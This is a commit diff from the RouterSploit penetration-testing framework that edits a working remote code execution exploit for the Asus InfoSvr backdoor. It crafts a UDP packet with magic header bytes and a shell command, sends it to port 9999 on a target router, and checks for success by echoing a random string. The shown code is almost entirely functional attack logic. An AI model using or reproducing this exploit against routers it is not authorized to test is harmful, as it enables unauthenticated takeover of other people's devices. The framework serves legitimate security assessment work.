Adding check random value to Asus InfoSvr Backdoor exploit

185870f1 · Marcin Bury · 0bb49931 · 185870f1
Commit 185870f1 authored Oct 30, 2016 by Marcin Bury
Hide whitespace changes
Inline Side-by-side

Showing with 9 additions and 9 deletions

infosvr_backdoor_rce.py routersploit/modules/exploits/asus/infosvr_backdoor_rce.py +9 -9

No files found.
--- a/routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
+++ b/routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
@@ -9,6 +9,7 @@ from routersploit import (
    print_error,
    mute,
    shell,
+    random_text,
 )


@@ -66,13 +67,13 @@ class Exploit(exploits.Exploit):
            print_error('Your command must be at most 237 characters long. Longer strings might crash the server.')
            return

-        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.bind(('0.0.0.0', 9999))
-        sock.settimeout(2)
+        try:
+            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+            sock.bind(('0.0.0.0', 9999))
+            sock.settimeout(2)

-        packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')
+            packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')

-        try:
            sock.sendto(packet, (self.target, 9999))
        except socket.error:
            return ""
@@ -92,11 +93,10 @@ class Exploit(exploits.Exploit):

    @mute
    def check(self):
-        NUM_CHECKS = 5  # we try 5 times because the exploit, tends to be unstable
+        NUM_CHECKS = 5  # we try 5 times because the exploit tends to be unstable

-        for i in xrange(NUM_CHECKS):
-            # maybe random mark should be implemented
-            random_value = "116b8df6aee055a05032ed26726c032914dc5dae"
+        for _ in range(NUM_CHECKS):
+            random_value = random_text(32)
            cmd = "echo {}".format(random_value)
            try:
                retval = self.execute(cmd)